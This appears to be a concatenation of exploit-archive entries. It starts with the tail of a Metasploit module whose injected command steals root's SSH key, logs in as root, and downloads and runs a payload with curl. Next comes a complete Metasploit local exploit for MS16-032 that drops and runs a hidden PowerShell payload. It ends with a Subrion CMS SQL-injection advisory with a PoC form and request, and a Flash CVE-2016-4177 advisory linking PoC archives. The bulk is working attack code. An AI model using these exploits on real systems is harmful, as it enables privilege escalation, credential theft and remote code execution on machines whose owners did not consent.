privesc_exec_cmd = "xjxfun=get_request_key&xjxr=1457064346182&xjxargs[]=Stoken; sudo -u mazu /usr/mazu/bin/mazu-run /usr/bin/sudo /bin/date -f /opt/cascade/vault/ssh/root/id_rsa | cut -d ' ' -f 4- | tr -d '`' | tr -d \"'\" > /tmp/#{root_ssh_key_private}; chmod 600 /tmp/#{root_ssh_key_private}; ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -i /tmp/#{root_ssh_key_private} root@localhost '/usr/bin/curl -k #{payload_uri} -o /tmp/#{binary_payload}; chmod 755 /tmp/#{binary_payload}; /tmp/#{binary_payload}'"
cmd_inject(privesc_exec_cmd)
register_file_for_cleanup("/tmp/#{root_ssh_key_private}")
register_file_for_cleanup("/tmp/#{binary_payload}")
vprint_status('Finished primer hook, raising Timeout::Error manually')
raise(Timeout::Error)
end
#Handle incoming requests from the server
def on_request_uri(cli, request)
vprint_status("on_request_uri called: #{request.inspect}")
print_status('Sending the payload to the server...')
@elf_sent = true
send_response(cli, @pl)
end
end
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/payload_generator'
require 'msf/core/exploit/powershell'
require 'rex'
class MetasploitModule < Msf::Exploit::Local
Rank = NormalRanking
include Msf::Exploit::Powershell
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Process
include Msf::Post::File
include Msf::Post::Windows::ReflectiveDLLInjection
def initialize(info = {})
super(update_info(info,
'Name' => 'MS16-032 Secondary Logon Handle Privilege Escalation',
'Description' => %q{
This module exploits the lack of sanitization of standard handles in Windows' Secondary
Logon Service. The vulnerability is known to affect versions of Windows 7-10 and 2k8-2k12
32 and 64 bit. This module will only work against those versions of Windows with
Powershell 2.0 or later and systems with two or more CPU cores.
},
'License' => BSD_LICENSE,
'Author' =>
[
'James Forshaw', # twitter.com/tiraniddo
'b33f', # @FuzzySec, http://www.fuzzysecurity.com'
'khr0x40sh'
],
'References' =>
[
[ 'MS', 'MS16-032'],
[ 'CVE', '2016-0099'],
[ 'URL', 'https://twitter.com/FuzzySec/status/723254004042612736' ],
[ 'URL', 'https://googleprojectzero.blogspot.co.uk/2016/03/exploiting-leaked-thread-handle.html']
],
'DefaultOptions' =>
{
'WfsDelay' => 30,
'EXITFUNC' => 'thread'
},
'DisclosureDate' => 'Mar 21 2016',
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ],
'Targets' =>
[
# Tested on (32 bits):
# * Windows 7 SP1
[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
# Tested on (64 bits):
# * Windows 7 SP1
# * Windows 8
# * Windows 2012
[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
],
'DefaultTarget' => 0
))
register_advanced_options(
[
OptString.new('W_PATH', [false, 'Where to write temporary powershell file', nil]),
OptBool.new( 'DRY_RUN', [false, 'Only show what would be done', false ]),
# How long until we DELETE file, we have a race condition here, so anything less than 60
# seconds might break
OptInt.new('TIMEOUT', [false, 'Execution timeout', 60])
], self.class)
end
def get_arch
arch = nil
if sysinfo["Architecture"] =~ /(wow|x)64/i
arch = ARCH_X86_64
elsif sysinfo["Architecture"] =~ /x86/i
arch = ARCH_X86
end
arch
end
def check
os = sysinfo["OS"]
if os !~ /win/i
# Non-Windows systems are definitely not affected.
return Exploit::CheckCode::Safe
end
Exploit::CheckCode::Detected
end
def exploit
if is_system?
fail_with(Failure::None, 'Session is already elevated')
end
arch1 = get_arch
if check == Exploit::CheckCode::Safe
print_error("Target is not Windows")
return
elsif arch1 == nil
print_error("Architecture could not be determined.")
return
end
# Exploit PoC from 'b33f'
ps_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2016-0099', 'cve_2016_0099.ps1')
vprint_status("PS1 loaded from #{ps_path}")
ms16_032 = File.read(ps_path)
cmdstr = expand_path('%windir%') << '\\System32\\windowspowershell\\v1.0\\powershell.exe'
if datastore['TARGET'] == 0 && arch1 == ARCH_X86_64
cmdstr.gsub!("System32","SYSWOW64")
print_warning("Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell")
vprint_warning("#{cmdstr}")
end
# payload formatted to fit dropped text file
payl = cmd_psh_payload(payload.encoded,payload.arch,{
encode_final_payload: false,
remove_comspec: true,
method: 'old'
})
payl.sub!(/.*?(?=New-Object IO)/im, "")
payl = payl.split("';$s.")[0]
payl.gsub!("''","'")
payl = "$s=#{payl}while($true){Start-Sleep 1000};"
@upfile=Rex::Text.rand_text_alpha((rand(8)+6))+".txt"
path = datastore['W_PATH'] || pwd
@upfile = "#{path}\\#{@upfile}"
fd = session.fs.file.new(@upfile,"wb")
print_status("Writing payload file, #{@upfile}...")
fd.write(payl)
fd.close
psh_cmd = "IEX `$(gc #{@upfile})"
#lpAppName
ms16_032.gsub!("$cmd","\"#{cmdstr}\"")
#lpcommandLine - capped at 1024b
ms16_032.gsub!("$args1","\" -exec Bypass -nonI -window Hidden #{psh_cmd}\"")
print_status('Compressing script contents...')
ms16_032_c = compress_script(ms16_032)
if ms16_032_c.size > 8100
print_error("Compressed size: #{ms16_032_c.size}")
error_msg = "Compressed size may cause command to exceed "
error_msg += "cmd.exe's 8kB character limit."
print_error(error_msg)
else
print_good("Compressed size: #{ms16_032_c.size}")
end
if datastore['DRY_RUN']
print_good("cmd.exe /C powershell -exec Bypass -nonI -window Hidden #{ms16_032_c}")
return
end
print_status("Executing exploit script...")
cmd = "cmd.exe /C powershell -exec Bypass -nonI -window Hidden #{ms16_032_c}"
args = nil
begin
process = session.sys.process.execute(cmd, args, {
'Hidden' => true,
'Channelized' => false
})
rescue
print_error("An error occurred executing the script.")
end
end
def cleanup
sleep_t = datastore['TIMEOUT']
vprint_warning("Sleeping #{sleep_t} seconds before deleting #{@upfile}...")
sleep sleep_t
begin
rm_f(@upfile)
print_good("Cleaned up #{@upfile}")
rescue
print_error("There was an issue with cleanup of the powershell payload script.")
end
end
end
Document Title:
===============
Subrion v4.0.5 CMS - SQL Injection Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1893
Release Date:
=============
2016-08-04
Vulnerability Laboratory ID (VL-ID):
====================================
1893
Common Vulnerability Scoring System:
====================================
7
Product & Service Introduction:
===============================
Subrion is a full featured open source CMS written in PHP 5 & MySQL with many options. Here is the list of the most important features.
You don't need to pay a single penny to start using Subrion CMS. It's not encrypted in any way so you can customize it per your needs.
It's done to focus on the content management process. Start it hassle-free within just a few minutes and take care of the content.
(Copy of the Vendor Homepage: http://www.subrion.org/download/ )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a remote sql-injection vulnerability in the Subrion v4.0.5 content management system.
Vulnerability Disclosure Timeline:
==================================
2016-08-04: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Intelliants LLC
Product: Subrion - Content Management System (Web-Application) 4.0.5
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A remote sql-injection web vulnerability has been discovered in the Subrion v4.0.5 content management system.
The vulnerability allows remote attackers to execute own malicious sql commands to compromise the application or dbms.
The sql-injection vulnerability is located in the `query` and ` show_query` parameters of the `.database/sql/` module POST
method request. Remote attackers are able to execute own sql commands by usage of the insecure sql management tool request.
The attack vector of the vulnerability is application-side and the request method to inject is POST.
The security risk of the sql-injection vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.0.
Exploitation of the remote sql injection web vulnerability requires no user interaction and a low privileged web-application user account.
Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] ./database/sql/
Vulnerable Parameter(s):
[+] show_query
[+] query
Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers with privileged web-application user account and without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
PoC: Exploitation
<html>
<head><body>
<title>Subrion CMS - Remote SQL Injection PoC</title>
<form action="http://subrion.localhost:8080/admin/database/sql/" method="post">
<input query="-1'[SQL-INJECTION VULNERABILITY!]--" value="-1'[SQL-INJECTION VULNERABILITY!]--">
<input show_query="-1'[SQL-INJECTION VULNERABILITY!]--" value="-1'[SQL-INJECTION VULNERABILITY!]--">
<input exec_query="Go" value"Go"
<button>Send POST Method Request</button>
</body></head>
</form>
</html>
POST /admin/database/sql/ HTTP/1.1
Host: http://subrion.localhost:8080
query=[SQL-INJECTION VULNERABILITY!]&show_query=[SQL-INJECTION VULNERABILITY!]&exec_query=Go
--- SQL Error Exception Logs ---
You have an error in your SQL syntax;
Check the manual that corresponds to your MySQL server version for the right syntax to use near 'command `extras`' at line 1}
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST /database/sql/
Mime Type[text/html]
Request Header:
Host[subrion.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Referer[/admin/database/sql/]
Cookie[INTELLI_6321e8217b=f98078af3840ae5ba4a4800445924360; INTELLI_6321e8217b=f98078af3840ae5ba4a4800445924360; INTELLI_6321e8217b=f98078af3840ae5ba4a4800445924360; INTELLI_6321e8217b=f98078af3840ae5ba4a4800445924360; loader=loaded; INTELLI_a1ef1b4b28=63c87c36882a10136a627aea5a94a581; _ga=GA1.2.1118331789.1469788535; _gat=1]
Connection[keep-alive]
POST-Daten:
__st[6a4bf637dc90a9d8dd203fff134f8140]
query[-1'SQL-INJECTION VULNERABILITY!]
show_query[-1'SQL-INJECTION VULNERABILITY!]
exec_query[Go]
Response Header:
Date[Fri, 29 Jul 2016 10:38:22 GMT]
Server[Apache]
X-Powered-By[PHP/5.5.30]
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
Set-Cookie[INTELLI_6321e8217b=f98078af3840ae5ba4a4800445924360; expires=Fri, 29-Jul-2016 11:08:22 GMT; Max-Age=1800]
Vary[Accept-Encoding]
Content-Length[5329]
Content-Type[text/html]
Note: Use the permanent cookie to trigger the bug remotly on default setup without admin access credentials.
Cookie: [f98078af3840ae5ba4a4800445924360] & [63c87c36882a10136a627aea5a94a581]
Reference(s):
http://subrion.localhost:8080/
http://subrion.localhost:8080/admin/
http://subrion.localhost:8080/admin/database/
http://subrion.localhost:8080/admin/database/sql/
Solution - Fix & Patch:
=======================
The sql-injection vulnerability can be patched by usage of a prepared statement in the sql database tool POST method request.
Parse and filter the parameter input of the query and show_query values. Disallow the usage of special chars to prevent further attacks.
Escape the entries to ensure the context is secure transmitted via POST method request.
Security Risk:
==============
The security risk of the remote sql-injection web vulnerability in the `query` and `show_query` parameters of the`/database/sql/`module is estimated high. (CVSS 7.0)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] [http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied,
including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage,
including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised
of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing
limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically
redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or
its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific
authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@vulnerability-lab.com) to get a ask permission.
Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
#####################################################################################
# Application: Adobe Flash Player
# Platforms: Windows,OSX
# Versions: 22.0.0.192 and earlier
# Author: Francis Provencher of COSIG
# Website: https://cosig.gouv.qc.ca/avis/
# Twitter: @COSIG_
# Date: 12 juillet 2016
# CVE-2016-4177
# COSIG-2016-21
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
Adobe Flash Player (labeled Shockwave Flash in Internet Explorer and Firefox) is a freeware software for using content created on the Adobe Flash platform, including viewing multimedia, executing rich Internet applications, and streaming video and audio. Flash Player can run from a web browser as a browser plug-in or on supported mobile devices.[7] Flash Player was created by Macromedia and has been developed and distributed by Adobe Systems since Adobe acquired Macromedia.
(https://en.wikipedia.org/wiki/Adobe_Flash_Player)
#####################################################################################
====================
2) Report Timeline
====================
2016-05-10: Francis Provencher du COSIG of COSIG report this vulnerability to Adobe PSIRT;
2016-05-17: Adobe PSIRT confirm this vulnerability;
2016-07-12: Adobe publish a patch (APSB16-25);
2016-07-12: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to a part of the dynamically allocated memory using a user interaction
visiting a Web page or open a specially crafted SWF file, which contains ‘SceneAndFrameData’ invalid data.
#####################################################################################
===========
4) POC:
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-21.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40104.zip
###############################################################################